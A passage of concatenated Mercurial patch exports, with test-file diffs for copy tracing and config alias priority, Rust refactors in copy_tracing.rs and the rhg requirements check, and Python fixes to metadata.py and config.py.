p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: existing copy information overwritten on one branch, with different content) @@ -572,7 +572,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -623,7 +623,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: merging a change to a file with a "copy overwrite" to that file from another branch @@ -678,7 +678,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -736,7 +736,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o 
i-0 initial commit: a b h p q r @@ -785,7 +785,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -834,7 +834,7 @@ | | o | i-1: a -move-> c, p -move-> s |/ - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Variant of previous with extra changes introduced by the merge @@ -888,7 +888,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Decision from previous merge are properly chained with later merge @@ -995,7 +995,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: chaining conflicting rename resolution, with actual merging happening @@ -1094,7 +1094,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: chaining salvage information during a merge @@ -1177,7 +1177,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -1273,7 +1273,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Subcase: chaining conflicting rename resolution, with extra change during the merge @@ -1356,7 +1356,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Summary of all created cases @@ -1379,7 +1379,7 @@ f-2: rename i -> d g-1: update d h-1: b -(move)-> d - i-0 initial commit: a b h + i-0 initial commit: a b h p q r i-1: a -move-> c, p -move-> s i-2: c -move-> d, s -move-> t j-1: unrelated changes (based on the "a" series of changes) @@ -1919,7 +1919,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mABm")' @@ -1986,7 +1986,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r - comparing from the merge @@ -2072,7 
+2072,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBDm-0")' M d @@ -2163,7 +2163,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' @@ -2294,7 +2294,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBFm-0")' M b @@ -2343,7 +2343,7 @@ | o f-1: rename h -> i : - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2359,7 +2359,7 @@ | o f-1: rename h -> i : - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2392,7 +2392,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBRm-0")' M b @@ -2441,7 +2441,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2457,7 +2457,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2492,7 +2492,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r One side of the merge have a long history with rename. The other side of the merge point to a new file with a smaller history. Each side is "valid". 
@@ -2535,7 +2535,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2564,7 +2564,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2606,7 +2606,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Note: @@ -2688,7 +2688,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2714,7 +2714,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work @@ -2750,7 +2750,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #if no-changeset @@ -2879,7 +2879,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r 'a' is the copy source of 'd' @@ -2930,7 +2930,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r 'a' is the the copy source of 'd' @@ -2982,7 +2982,7 @@ | | o | i-1: a -move-> c, p -move-> s |/ - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")' @@ -3049,7 +3049,7 @@ | o i-1: a -move-> c, p -move-> s | - o i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #if no-changeset $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610103496 -3600 # Fri Jan 08 11:58:16 2021 +0100 # Node ID 1fce35fcb4db0194edb2bd2ee471692ed9a90612 # Parent 
d7d64b8c8229e47073634ca8860c060ac5949a5e copies-rust: pass `PathToken` around by value It’s just a `usize`. Differential Revision: https://phab.mercurial-scm.org/D10069 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -617,7 +617,7 @@ ) -> InternalPathCopies { use crate::utils::{ordmap_union_with_merge, MergeResult}; - ordmap_union_with_merge(minor, major, |dest, src_minor, src_major| { + ordmap_union_with_merge(minor, major, |&dest, src_minor, src_major| { let (pick, overwrite) = compare_value( path_map, current_merge, @@ -664,7 +664,7 @@ path_map: &TwoWayPathMap, current_merge: Revision, changes: &ChangedFiles, - dest: &PathToken, + dest: PathToken, src_minor: &CopySource, src_major: &CopySource, ) -> (MergePick, bool) { @@ -693,7 +693,7 @@ } } else { debug_assert!(src_major.rev != src_major.rev); - let dest_path = path_map.untokenize(*dest); + let dest_path = path_map.untokenize(dest); let action = changes.get_merge_case(dest_path); if src_minor.path.is_some() && src_major.path.is_none() # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610363836 -3600 # Mon Jan 11 12:17:16 2021 +0100 # Node ID 80f7567ac9bb142ed752439eeb6dd41736e10f10 # Parent 1fce35fcb4db0194edb2bd2ee471692ed9a90612 copies-rust: pass closures and iterators instead of `&ChangedFiles` … to some functions that only use one method. This will makes it easier to unit-test them. 
Differential Revision: https://phab.mercurial-scm.org/D10070 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -387,6 +387,21 @@ p2: Revision, changes: ChangedFiles<'_>, ) { + self.add_revision_inner(rev, p1, p2, changes.iter_actions(), |path| { + changes.get_merge_case(path) + }) + } + + /// Separated out from `add_revsion` so that unit tests can call this + /// without synthetizing a `ChangedFiles` in binary format. + fn add_revision_inner<'a>( + &mut self, + rev: Revision, + p1: Revision, + p2: Revision, + copy_actions: impl Iterator<Item = Action<'a>>, + get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, + ) { // Retrieve data computed in a previous iteration let p1_copies = match p1 { NULL_REVISION => None, @@ -409,7 +424,7 @@ &mut self.path_map, p1_copies, p2_copies, - &changes, + copy_actions, rev, ); let copies = match (p1_copies, p2_copies) { @@ -421,7 +436,7 @@ rev, p2_copies, p1_copies, - &changes, + get_merge_case, )), }; if let Some(c) = copies { @@ -476,11 +491,11 @@ /// Combine ChangedFiles with some existing PathCopies information and return /// the result -fn chain_changes( +fn chain_changes<'a>( path_map: &mut TwoWayPathMap, base_p1_copies: Option<InternalPathCopies>, base_p2_copies: Option<InternalPathCopies>, - changes: &ChangedFiles, + copy_actions: impl Iterator<Item = Action<'a>>, current_rev: Revision, ) -> (Option<InternalPathCopies>, Option<InternalPathCopies>) { // Fast path the "nothing to do" case. 
@@ -490,7 +505,7 @@ let mut p1_copies = base_p1_copies.clone(); let mut p2_copies = base_p2_copies.clone(); - for action in changes.iter_actions() { + for action in copy_actions { match action { Action::CopiedFromP1(path_dest, path_source) => { match &mut p1_copies { @@ -613,16 +628,14 @@ current_merge: Revision, minor: InternalPathCopies, major: InternalPathCopies, - changes: &ChangedFiles, + get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, ) -> InternalPathCopies { use crate::utils::{ordmap_union_with_merge, MergeResult}; ordmap_union_with_merge(minor, major, |&dest, src_minor, src_major| { let (pick, overwrite) = compare_value( - path_map, current_merge, - changes, - dest, + || get_merge_case(path_map.untokenize(dest)), src_minor, src_major, ); @@ -649,6 +662,7 @@ /// represent the side that should prevail when merging two /// InternalPathCopies +#[derive(Debug, PartialEq)] enum MergePick { /// The "major" (p1) side prevails Major, @@ -661,10 +675,8 @@ /// decide which side prevails in case of conflicting values #[allow(clippy::if_same_then_else)] fn compare_value( - path_map: &TwoWayPathMap, current_merge: Revision, - changes: &ChangedFiles, - dest: PathToken, + merge_case_for_dest: impl Fn() -> MergeCase, src_minor: &CopySource, src_major: &CopySource, ) -> (MergePick, bool) { @@ -693,8 +705,7 @@ } } else { debug_assert!(src_major.rev != src_major.rev); - let dest_path = path_map.untokenize(dest); - let action = changes.get_merge_case(dest_path); + let action = merge_case_for_dest(); if src_minor.path.is_some() && src_major.path.is_none() && action == MergeCase::Salvaged # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614291275 -3600 # Thu Feb 25 23:14:35 2021 +0100 # Node ID f64b6953db7048c28fa66a7532c1f092c20e3204 # Parent 80f7567ac9bb142ed752439eeb6dd41736e10f10 rhg: Bug fix: with share-safe, always read store requirements That is, the `store/requires` file, regardless of whether the repository is a shared. 
Differential Revision: https://phab.mercurial-scm.org/D10078 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -116,9 +116,6 @@ let store_path; if !shared { store_path = dot_hg.join("store"); - if share_safe { - reqs.extend(requirements::load(Vfs { base: &store_path })?); - } } else { let bytes = hg_vfs.read("sharedpath")?; let mut shared_path = get_path_from_bytes(&bytes).to_owned(); @@ -166,6 +163,9 @@ repo_config_files.insert(0, shared_path.join("hgrc")) } } + if share_safe { + reqs.extend(requirements::load(Vfs { base: &store_path })?); + } let repo_config = config.combine_with_repo(&repo_config_files)?; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614284704 -3600 # Thu Feb 25 21:25:04 2021 +0100 # Node ID a069639783a0d3038805e01badf0479502f08c40 # Parent f64b6953db7048c28fa66a7532c1f092c20e3204 rhg: Check .hg/requires for absence of required features Some old repository layouts are not supported. Differential Revision: https://phab.mercurial-scm.org/D10076 diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,5 +1,6 @@ use crate::errors::{HgError, HgResultExt}; use crate::repo::{Repo, Vfs}; +use crate::utils::join_display; use std::collections::HashSet; fn parse(bytes: &[u8]) -> Result<HashSet<String>, HgError> { @@ -42,34 +43,48 @@ } pub(crate) fn check(repo: &Repo) -> Result<(), HgError> { - for feature in repo.requirements() { - if !SUPPORTED.contains(&feature.as_str()) { - // TODO: collect and all unknown features and include them in the - // error message? 
- return Err(HgError::UnsupportedFeature(format!( - "repository requires feature unknown to this Mercurial: {}", - feature - ))); - } + let unknown: Vec<_> = repo + .requirements() + .iter() + .map(String::as_str) + // .filter(|feature| !ALL_SUPPORTED.contains(feature.as_str())) + .filter(|feature| { + !REQUIRED.contains(feature) && !SUPPORTED.contains(feature) + }) + .collect(); + if !unknown.is_empty() { + return Err(HgError::unsupported(format!( + "repository requires feature unknown to this Mercurial: {}", + join_display(&unknown, ", ") + ))); + } + let missing: Vec<_> = REQUIRED + .iter() + .filter(|&&feature| !repo.requirements().contains(feature)) + .collect(); + if !missing.is_empty() { + return Err(HgError::unsupported(format!( + "repository is missing feature required by this Mercurial: {}", + join_display(&missing, ", ") + ))); } Ok(()) } -// TODO: set this to actually-supported features +/// rhg does not support repositories that are *missing* any of these features +const REQUIRED: &[&str] = &["revlogv1", "store", "fncache", "dotencode"]; + +/// rhg supports repository with or without these const SUPPORTED: &[&str] = &[ - "dotencode", - "fncache", "generaldelta", - "revlogv1", SHARED_REQUIREMENT, SHARESAFE_REQUIREMENT, SPARSEREVLOG_REQUIREMENT, RELATIVE_SHARED_REQUIREMENT, - "store", // As of this writing everything rhg does is read-only. 
// When it starts writing to the repository, it’ll need to either keep the // persistent nodemap up to date or remove this entry: - "persistent-nodemap", + NODEMAP_REQUIREMENT, ]; // Copied from mercurial/requirements.py: diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -11,6 +11,8 @@ use crate::utils::hg_path::HgPath; use im_rc::ordmap::DiffItem; use im_rc::ordmap::OrdMap; +use std::cell::Cell; +use std::fmt; use std::{io::Write, ops::Deref}; pub mod files; @@ -378,3 +380,43 @@ right } } + +/// Join items of the iterable with the given separator, similar to Python’s +/// `separator.join(iter)`. +/// +/// Formatting the return value consumes the iterator. +/// Formatting it again will produce an empty string. +pub fn join_display( + iter: impl IntoIterator<Item = impl fmt::Display>, + separator: impl fmt::Display, +) -> impl fmt::Display { + JoinDisplay { + iter: Cell::new(Some(iter.into_iter())), + separator, + } +} + +struct JoinDisplay<I, S> { + iter: Cell<Option<I>>, + separator: S, +} + +impl<I, T, S> fmt::Display for JoinDisplay<I, S> +where + I: Iterator<Item = T>, + T: fmt::Display, + S: fmt::Display, +{ + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + if let Some(mut iter) = self.iter.take() { + if let Some(first) = iter.next() { + first.fmt(f)?; + } + for value in iter { + self.separator.fmt(f)?; + value.fmt(f)?; + } + } + Ok(()) + } +} # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611918148 -3600 # Fri Jan 29 12:02:28 2021 +0100 # Node ID 377689cc295f09a2c5ed52563d39262a9590f56f # Parent a069639783a0d3038805e01badf0479502f08c40 config: test priority involving alias Differential Revision: https://phab.mercurial-scm.org/D9918 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -400,11 +400,15 @@ > pre-include= value-A > %include ./included.rc > post-include= 
value-A + > [command-templates] + > log = "value-A\n" > EOF $ cat > file-B.rc << EOF > [config-test] > basic = value-B + > [ui] + > logtemplate = "value-B\n" > EOF @@ -437,3 +441,24 @@ $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic --config config-test.basic=value-CLI value-CLI + +Alias ordering +-------------- + +The official config is now `command-templates.log`, the historical +`ui.logtemplate` is a valid alternative for it. + +When both are defined, The config value read the last "win", this should keep +being true if the config have other alias. In other word, the config value read +earlier will be considered "lower level" and the config read later would be +considered "higher level". And higher level values wins. + +BROKEN: currently not the case. + + $ HGRCPATH="file-A.rc" hg log -r . + value-A + $ HGRCPATH="file-B.rc" hg log -r . + value-B + $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . + value-A (known-bad-output !) + value-B (missing-correct-output !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611918209 -3600 # Fri Jan 29 12:03:29 2021 +0100 # Node ID 702bb73d7330af19a23accbe70303c0156e2b2d2 # Parent 377689cc295f09a2c5ed52563d39262a9590f56f config: test priority involving alias and include Differential Revision: https://phab.mercurial-scm.org/D9919 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -418,6 +418,29 @@ > post-include= value-included > EOF + $ cat > file-C.rc << EOF + > %include ./included-alias-C.rc + > [ui] + > logtemplate = "value-C\n" + > EOF + + $ cat > included-alias-C.rc << EOF + > [command-templates] + > log = "value-included\n" + > EOF + + + $ cat > file-D.rc << EOF + > [command-templates] + > log = "value-D\n" + > %include ./included-alias-D.rc + > EOF + + $ cat > included-alias-D.rc << EOF + > [ui] + > logtemplate = "value-included\n" + > EOF + Simple order checking --------------------- @@ -462,3 +485,16 @@ $ 
HGRCPATH="file-A.rc:file-B.rc" hg log -r . value-A (known-bad-output !) value-B (missing-correct-output !) + +Alias and include +----------------- + +The pre/post include priority should also apply when tie-breaking alternatives. +See the case above for details about the two config options used. + + $ HGRCPATH="file-C.rc" hg log -r . + value-included (known-bad-output !) + value-C (missing-correct-output !) + $ HGRCPATH="file-D.rc" hg log -r . + value-D (known-bad-output !) + value-included (missing-correct-output !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611922020 -3600 # Fri Jan 29 13:07:00 2021 +0100 # Node ID 87f8b3add56bf1f518320543293a8f8b3a062b72 # Parent 702bb73d7330af19a23accbe70303c0156e2b2d2 config: test priority involving alias and cli Differential Revision: https://phab.mercurial-scm.org/D9920 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -498,3 +498,10 @@ $ HGRCPATH="file-D.rc" hg log -r . value-D (known-bad-output !) value-included (missing-correct-output !) + +command line override +--------------------- + + $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . --config ui.logtemplate="value-CLI\n" + value-A (known-bad-output !) + value-CLI (missing-correct-output !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614625706 -3600 # Mon Mar 01 20:08:26 2021 +0100 # Node ID dde86beca38896bae0cdee3393cb1c33dbdc7add # Parent 87f8b3add56bf1f518320543293a8f8b3a062b72 copies: tests and fix parallel computation of changed file information The code was mixing variable name and misbehaving in some case. This changeset fix it and also add a tests to validate it does not regress. Without the fix, the parallel-upgrade misbehavior in random ways. 
Differential Revision: https://phab.mercurial-scm.org/D10084 diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -882,14 +882,14 @@ data = {}, False if util.safehasattr(revlog, b'filteredrevs'): # this is a changelog # Is the data previously shelved ? - sidedata = staging.pop(rev, None) - if sidedata is None: + data = staging.pop(rev, None) + if data is None: # look at the queued result until we find the one we are lookig # for (shelve the other ones) r, data = sidedataq.get() while r != rev: staging[r] = data - r, sidedata = sidedataq.get() + r, data = sidedataq.get() tokens.release() sidedata, has_copies_info = data new_flag = 0 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1,4 +1,4 @@ -#testcases filelog compatibility changeset sidedata upgraded +#testcases filelog compatibility changeset sidedata upgraded upgraded-parallel ===================================================== Test Copy tracing for chain of copies involving merge @@ -1486,6 +1486,44 @@ #endif +#if upgraded-parallel + $ cat >> $HGRCPATH << EOF + > [format] + > exp-use-side-data = yes + > exp-use-copies-side-data-changeset = yes + > [experimental] + > worker.repository-upgrade=yes + > [worker] + > enabled=yes + > numcpus=8 + > EOF + $ hg debugformat -v + format-variant repo config default + fncache: yes yes yes + dotencode: yes yes yes + generaldelta: yes yes yes + share-safe: no no no + sparserevlog: yes yes yes + sidedata: no yes no + persistent-nodemap: no no no + copies-sdc: no yes no + plain-cl-delta: yes yes yes + compression: * (glob) + compression-level: default default default + $ hg debugupgraderepo --run --quiet + upgrade will perform the following actions: + + requirements + preserved: * (glob) + added: exp-copies-sidedata-changeset, exp-sidedata-flag + + processed revlogs: + - all-filelogs + - changelog + - 
manifest + +#endif + #if no-compatibility no-filelog no-changeset @@ -3172,18 +3210,21 @@ a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE,Km")' f A f a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f A f a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) The result from mEAm is the same for the subsequent merge: @@ -3193,18 +3234,21 @@ a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA,Jm")' f A f a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f A f a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) Subcase: chaining conflicting rename resolution ``````````````````````````````````````````````` @@ -3221,18 +3265,21 @@ r (filelog !) p (sidedata !) p (upgraded !) + p (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQ,Tm")' v A v r (filelog !) p (sidedata !) p (upgraded !) + p (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v A v r (filelog !) p (sidedata !) p (upgraded !) + p (upgraded-parallel !) The result from mQPm is the same for the subsequent merge: @@ -3250,6 +3297,7 @@ r (filelog !) r (sidedata !) r (upgraded !) + r (upgraded-parallel !) Subcase: chaining salvage information during a merge @@ -3330,11 +3378,13 @@ a (filelog !) h (sidedata !) h (upgraded !) + h (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm")' d A d a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) Chained output @@ -3343,11 +3393,13 @@ a (filelog !) h (sidedata !) h (upgraded !) + h (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFG,Om")' d A d a (filelog !) h (sidedata !) 
h (upgraded !) + h (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d @@ -3373,12 +3425,14 @@ a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change,Km")' f A f a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f A f @@ -3392,15 +3446,18 @@ a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change,Jm")' f A f a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f A f a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614638669 28800 # Mon Mar 01 14:44:29 2021 -0800 # Node ID f2fc34e882388423f1bfca0a9a1ce87e1080d0e3 # Parent dde86beca38896bae0cdee3393cb1c33dbdc7add copies-rust: remove an unnecessary format!() inside assert!() The `assert!()` macro supports formatting. Rust 2021 no longer supports an unnecessary `format!()` inside it. I noticed because I recently update my Rust toolchain and `test-check-cargo-lock.t` started failing. 
Differential Revision: https://phab.mercurial-scm.org/D10085 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -357,7 +357,7 @@ } fn untokenize(&self, token: PathToken) -> &HgPathBuf { - assert!(token < self.path.len(), format!("Unknown token: {}", token)); + assert!(token < self.path.len(), "Unknown token: {}", token); &self.path[token] } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611963162 -3600 # Sat Jan 30 00:32:42 2021 +0100 # Node ID 7621ab4005bf34c4261a093d256f0e884d86324c # Parent f2fc34e882388423f1bfca0a9a1ce87e1080d0e3 config: use a new `alter` method in `fixconfig` The `set` function is doing various work related to metadata (eg: the source, later the level). However the `fixconfig` call only updating some values according to standard processing, not changing any of the related metadata. So we introduce a new method and use it there. 
Differential Revision: https://phab.mercurial-scm.org/D9924 diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -108,6 +108,16 @@ self._source = self._source.preparewrite() self._source[(section, item)] = source + def alter(self, section, key, new_value): + """alter a value without altering its source or level + + This method is meant to be used by `ui.fixconfig` only.""" + item = self._data[section][key] + size = len(item) + new_item = (new_value,) + item[1:] + assert len(new_item) == size + self._data[section][key] = new_item + def restore(self, data): """restore data returned by self.backup""" self._source = self._source.preparewrite() diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -554,7 +554,7 @@ p = util.expandpath(p) if not util.hasscheme(p) and not os.path.isabs(p): p = os.path.normpath(os.path.join(root, p)) - c.set(b"paths", n, p) + c.alter(b"paths", n, p) if section in (None, b'ui'): # update ui options # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611912483 -3600 # Fri Jan 29 10:28:03 2021 +0100 # Node ID d3df397e7a59b416ead210ebcac50579118a5c35 # Parent 7621ab4005bf34c4261a093d256f0e884d86324c config: track "source" along side value Currently the source is stored in a entirely different way than the data. This is impractical. Especially if we are about to add more of such metadata. So lets put them back together. 
Differential Revision: https://phab.mercurial-scm.org/D9925 diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -27,9 +27,6 @@ if data: for k in data._data: self._data[k] = data[k].copy() - self._source = data._source.copy() - else: - self._source = util.cowdict() def copy(self): return config(self) @@ -48,13 +45,11 @@ yield d def update(self, src): - self._source = self._source.preparewrite() for s, n in src._unset: ds = self._data.get(s, None) if ds is not None and n in ds: self._data[s] = ds.preparewrite() del self._data[s][n] - del self._source[(s, n)] for s in src: ds = self._data.get(s, None) if ds: @@ -62,31 +57,40 @@ else: self._data[s] = util.cowsortdict() self._data[s].update(src._data[s]) - self._source.update(src._source) + + def _get(self, section, item): + return self._data.get(section, {}).get(item) def get(self, section, item, default=None): - return self._data.get(section, {}).get(item, default) + result = self._get(section, item) + if result is None: + return default + return result[0] - def backup(self, section, item): + def backup(self, section, key): """return a tuple allowing restore to reinstall a previous value The main reason we need it is because it handles the "no data" case. 
""" try: - value = self._data[section][item] - source = self.source(section, item) - return (section, item, value, source) + item = self._data[section][key] except KeyError: - return (section, item) + return (section, key) + else: + return (section, key) + item def source(self, section, item): - return self._source.get((section, item), b"") + result = self._get(section, item) + if result is None: + return b"" + return result[1] def sections(self): return sorted(self._data.keys()) def items(self, section): - return list(pycompat.iteritems(self._data.get(section, {}))) + items = pycompat.iteritems(self._data.get(section, {})) + return [(k, v) for (k, (v, s)) in items] def set(self, section, item, value, source=b""): if pycompat.ispy3: @@ -103,10 +107,7 @@ self._data[section] = util.cowsortdict() else: self._data[section] = self._data[section].preparewrite() - self._data[section][item] = value - if source: - self._source = self._source.preparewrite() - self._source[(section, item)] = source + self._data[section][item] = (value, source) def alter(self, section, key, new_value): """alter a value without altering its source or level @@ -120,19 +121,17 @@ def restore(self, data): """restore data returned by self.backup""" - self._source = self._source.preparewrite() - if len(data) == 4: + if len(data) != 2: # restore old data - section, item, value, source = data + section, key = data[:2] + item = data[2:] self._data[section] = self._data[section].preparewrite() - self._data[section][item] = value - self._source[(section, item)] = source + self._data[section][key] = item else: # no data before, remove everything section, item = data if section in self._data: self._data[section].pop(item, None) - self._source.pop((section, item), None) def parse(self, src, data, sections=None, remap=None, include=None): sectionre = util.re.compile(br'\[([^\[]+)\]') # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611915709 -3600 # Fri Jan 29 11:21:49 
